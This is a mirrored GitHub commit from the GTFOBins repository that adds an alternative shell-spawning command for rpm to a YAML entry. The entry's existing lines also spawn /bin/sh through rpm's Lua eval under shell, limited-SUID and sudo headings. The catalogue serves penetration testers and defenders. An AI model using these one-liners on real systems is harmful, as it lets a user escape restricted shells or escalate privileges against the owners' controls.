1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-08 07:49:17 +01:00

Add alternative shell for rpm

This commit is contained in:
Andrea Cardaci 2021-04-08 07:58:39 +02:00 committed by GitHub
commit 6fda805b6a
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

@ -2,6 +2,7 @@
functions:
shell:
- code: rpm --eval '%{lua:os.execute("/bin/sh")}'
- code: rpm --pipe '/bin/sh 0<&1'
limited-suid:
- code: ./rpm --eval '%{lua:os.execute("/bin/sh")}'
sudo: